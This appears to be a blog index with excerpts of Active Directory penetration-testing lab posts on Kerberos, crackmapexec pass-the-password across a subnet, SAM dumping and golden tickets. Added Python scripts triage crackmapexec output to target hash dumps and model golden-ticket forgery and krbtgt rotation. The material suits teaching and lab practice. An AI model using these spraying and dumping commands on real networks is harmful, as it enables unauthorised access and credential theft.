Understanding Kerberos

Kerberos is a network authentication protocol (originally developed at MIT) that Active Directory uses by default; it enables clients to authenticate on the network and access services within the Windows domain. Kerberos provides single sign-on (SSO), which allows a user to authenticate once on a network and then access resources without re-entering their credentials each time they reach a new resource, such as a mapped network drive. Kerberos supports delegated authentication, which allows a service running on a client's computer to act on behalf of the authenticated domain user when it connects to other services on the network. Kerberos supports interoperability, so a Windows-based operating system can work in other networks that also use Kerberos as their authentication mechanism. Kerberos also supports mutual authentication, which allows the client and the service to validate each other's identity, rather than only the server validating the client. ...

November 24, 2025 · 5 min · 954 words · 0x-s0M3n4th

Attacking Active Directory

We will perform lateral movement and vertical movement. Vertical movement allows a penetration tester to escalate their privileges within a network, whereas lateral movement focuses on reusing the same user privileges across multiple systems on the network. 1. Lateral movement with crackmapexec: power on Kali, THEPUNISHER and Windows Server 2022. We will perform a pass-the-password attack, reusing the password of the user fcastle across the entire domain. Make sure crackmapexec is installed on your Kali, then run: crackmapexec smb 10.11.12.0/24 -u fcastle -d MARVEL.local -p Password1. crackmapexec enumerates SMB on every host in the range and tries the credentials against each one: a [+] marks hosts where the username and password are valid, and the (Pwn3d!) tag marks hosts where fcastle is also a local administrator, which is what the later steps (such as dumping the SAM) require. 2. Retrieving the SAM database from the Windows devices across the domain using the following command: ...
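Triaging the crackmapexec output, as an added example that is not part of the original post: the sample output below is constructed (hosts, names and results are assumptions, not captures from the lab), and the script separates hosts where the credentials were merely valid from those where they gave local admin, since only the (Pwn3d!) hosts are worth pointing --sam at.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample of crackmapexec SMB output. Hosts, names and results are
# assumptions for illustration, not captures from the page's lab.
SAMPLE_CME_OUTPUT = """\
SMB         10.11.12.5      445    THEPUNISHER      [*] Windows 10.0 Build 19041 x64 (name:THEPUNISHER) (domain:MARVEL.local) (signing:False) (SMBv1:False)
SMB         10.11.12.5      445    THEPUNISHER      [+] MARVEL.local\\fcastle:Password1 (Pwn3d!)
SMB         10.11.12.3      445    HYDRA-DC         [*] Windows Server 2022 Build 20348 x64 (name:HYDRA-DC) (domain:MARVEL.local) (signing:True) (SMBv1:False)
SMB         10.11.12.3      445    HYDRA-DC         [+] MARVEL.local\\fcastle:Password1
SMB         10.11.12.7      445    SPIDERMAN        [*] Windows 10.0 Build 19041 x64 (name:SPIDERMAN) (domain:MARVEL.local) (signing:False) (SMBv1:False)
SMB         10.11.12.7      445    SPIDERMAN        [-] MARVEL.local\\fcastle:Password1 STATUS_LOGON_FAILURE
"""

# One result line: protocol, target IP, port, NetBIOS name, status marker, message.
LINE_RE = re.compile(
    r"^SMB\s+(?P<ip>\S+)\s+(?P<port>\d+)\s+(?P<host>\S+)\s+\[(?P<status>[+\-*!])\]\s+(?P<msg>.*)$"
)

Host = Tuple[str, str]  # (ip, hostname)


def triage(cme_output: str) -> Dict[str, List[Host]]:
    """Sort every host into admin / valid / failed from its crackmapexec result line.

    [+] alone means the credentials authenticated; [+] with (Pwn3d!) means the
    account is also a local administrator on that host. [*] banner lines carry
    no authentication result and are skipped.
    """
    buckets: Dict[str, List[Host]] = {"admin": [], "valid": [], "failed": []}
    for line in cme_output.splitlines():
        m = LINE_RE.match(line)
        if not m or m.group("status") == "*":
            continue
        host: Host = (m.group("ip"), m.group("host"))
        if m.group("status") == "+":
            key = "admin" if "(Pwn3d!)" in m.group("msg") else "valid"
            buckets[key].append(host)
        elif m.group("status") == "-":
            buckets["failed"].append(host)
    return buckets


def sam_targets(cme_output: str) -> List[str]:
    """IPs where --sam can succeed: reading the SAM hive needs local admin, not just a valid logon."""
    return [ip for ip, _ in triage(cme_output)["admin"]]


def sam_command(cme_output: str, user: str, domain: str, password: str) -> str:
    """Build the follow-up dump command against only the hosts that were Pwn3d!."""
    targets = " ".join(sam_targets(cme_output))
    return f"crackmapexec smb {targets} -u {user} -d {domain} -p {password} --sam"


if __name__ == "__main__":
    for bucket, hosts in triage(SAMPLE_CME_OUTPUT).items():
        print(f"{bucket:>6}: {', '.join(f'{name} ({ip})' for ip, name in hosts) or '-'}")
    print(sam_command(SAMPLE_CME_OUTPUT, "fcastle", "MARVEL.local", "Password1"))
```

Pipe real output into it with `crackmapexec smb 10.11.12.0/24 -u fcastle -d MARVEL.local -p Password1 | python3 triage.py` after swapping the constant for `sys.stdin.read()`; the point of the split is that a valid-but-not-admin host (the domain controller in the sample) will not give up its SAM, so spraying --sam at the whole range only adds noise to the logs.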

November 24, 2025 · 4 min · 769 words · 0x-s0M3n4th

Domain Dominance and Persistence

In this section we will learn about three techniques: 1. Golden Ticket, 2. Silver Ticket and 3. Skeleton Key. Golden Ticket: A golden ticket is a forged Kerberos TGT that an attacker (or penetration tester) builds from the domain's Security Identifier (SID), the domain name, and the NTLM hash (or AES key) of the krbtgt account, the built-in account whose key the KDC uses to protect every TGT it issues. The golden ticket allows a penetration tester to reach any device within the domain by performing a Pass-the-Ticket (PTT) attack. This is possible because a TGT is encrypted, and the PAC inside it signed, with keys derived from the krbtgt secret: whoever holds that secret can forge a ticket the KDC cannot distinguish from one it issued itself, carrying any user name, any group memberships and a lifetime of the forger's choosing. The golden ticket therefore lets anyone impersonate any user (even one that does not exist) with the privileges associated with the impersonated identity on systems within the domain. Worse, changing the krbtgt password once does not stop the attack: the KDC keeps accepting tickets protected with the previous krbtgt key, so the password must be reset twice (allowing replication to finish in between) before the forged ticket stops working. ...
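A toy model of why the golden ticket works and why one krbtgt reset is not enough, added here as an example and not code from the original post. It models only the ticket seal: a single HMAC-SHA256 stands in for the TGT encryption and PAC signature keys that real Kerberos derives from the krbtgt secret, the domain SID, RIDs and passwords are made-up assumptions, and the KDC keeps the current and previous krbtgt key the way a real domain controller does. The same model also shows the SSO flow from the Kerberos post above: one TGT obtained with a password is exchanged for service tickets without the password being sent again.

```python
import hashlib
import hmac
import json
from typing import Any, Dict, List, Optional, Sequence

# Made-up domain values (assumptions for illustration, not lab values).
DOMAIN = "MARVEL.local"
DOMAIN_SID = "S-1-5-21-1111111111-2222222222-3333333333"

Ticket = Dict[str, str]  # {"body": json claims, "tag": keyed checksum}


def derive_key(password: str) -> bytes:
    """Stand-in for turning an AD password into the account's long-term key
    (the NT hash or AES key a real KDC would use)."""
    return hashlib.sha256(password.encode("utf-16-le")).digest()


def seal(key: bytes, claims: Dict[str, Any]) -> Ticket:
    """Toy ticket protection: one HMAC-SHA256 stands in for both the TGT encryption
    and the PAC signatures, which real Kerberos derives from the same krbtgt secret."""
    body = json.dumps(claims, sort_keys=True)
    return {"body": body, "tag": hmac.new(key, body.encode(), hashlib.sha256).hexdigest()}


class KDC:
    """Minimal model of the AS and TGS roles of a domain controller."""

    def __init__(self, krbtgt_password: str) -> None:
        # A real DC keeps the current AND the previous krbtgt key so that tickets
        # issued just before a rotation keep working; that is why one reset is not enough.
        self.krbtgt_keys: List[bytes] = [derive_key(krbtgt_password)]
        self.accounts: Dict[str, Any] = {}  # user -> (rid, key)

    def add_user(self, name: str, rid: int, password: str) -> None:
        self.accounts[name] = (rid, derive_key(password))

    def rotate_krbtgt(self, new_password: str) -> None:
        """krbtgt password reset: new key in front, previous key kept, anything older dropped."""
        self.krbtgt_keys = [derive_key(new_password)] + self.krbtgt_keys[:1]

    def as_exchange(self, user: str, password: str) -> Optional[Ticket]:
        """AS-REQ/AS-REP: the only step that proves the password. The result is a TGT
        sealed with the krbtgt key that the client reuses for every later service (SSO)."""
        rid, key = self.accounts.get(user, (None, None))
        if key is None or not hmac.compare_digest(key, derive_key(password)):
            return None
        claims = {"user": user, "sid": f"{DOMAIN_SID}-{rid}", "groups": [513], "lifetime_h": 10}
        return seal(self.krbtgt_keys[0], claims)

    def tgs_exchange(self, tgt: Ticket, service: str) -> Optional[Dict[str, Any]]:
        """TGS-REQ/TGS-REP: no password check here. The KDC only verifies the seal on the
        TGT against its current or previous krbtgt key, then trusts the claims inside."""
        for key in self.krbtgt_keys:
            expected = hmac.new(key, tgt["body"].encode(), hashlib.sha256).hexdigest()
            if hmac.compare_digest(expected, tgt["tag"]):
                claims = json.loads(tgt["body"])
                return {"service": service, "user": claims["user"], "groups": claims["groups"]}
        return None  # sealed with a key the KDC no longer knows: rejected


def forge_golden_ticket(krbtgt_key: bytes, user: str, rid: int = 500,
                        groups: Sequence[int] = (512, 513, 518, 519, 520)) -> Ticket:
    """With the krbtgt key, the forger seals any claims at all: a name that need not exist,
    Domain Admins (512) and Enterprise Admins (519) membership, a ten-year lifetime."""
    claims = {"user": user, "sid": f"{DOMAIN_SID}-{rid}", "groups": list(groups), "lifetime_h": 87600}
    return seal(krbtgt_key, claims)


if __name__ == "__main__":
    kdc = KDC("krbtgt-initial-secret")
    kdc.add_user("fcastle", 1104, "Password1")
    tgt = kdc.as_exchange("fcastle", "Password1")
    print("legit TGS:", kdc.tgs_exchange(tgt, "cifs/THEPUNISHER.MARVEL.local"))
    golden = forge_golden_ticket(derive_key("krbtgt-initial-secret"), "Administrator")
    print("golden TGS:", kdc.tgs_exchange(golden, "cifs/HYDRA-DC.MARVEL.local"))
    kdc.rotate_krbtgt("krbtgt-second-secret")
    print("still valid after one reset:", kdc.tgs_exchange(golden, "cifs/HYDRA-DC.MARVEL.local") is not None)
    kdc.rotate_krbtgt("krbtgt-third-secret")
    print("still valid after two resets:", kdc.tgs_exchange(golden, "cifs/HYDRA-DC.MARVEL.local") is not None)
```

Two things the model makes concrete: the TGS step never consults the account database, so a forged ticket for a user that does not exist in `kdc.accounts` is still honoured, and the forged ticket survives the first krbtgt rotation only because the previous key is still in the ring. Real service tickets are additionally sealed with the target service's own key (the basis of the silver ticket), which this model leaves out.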

November 24, 2025 · 4 min · 844 words · 0x-s0M3n4th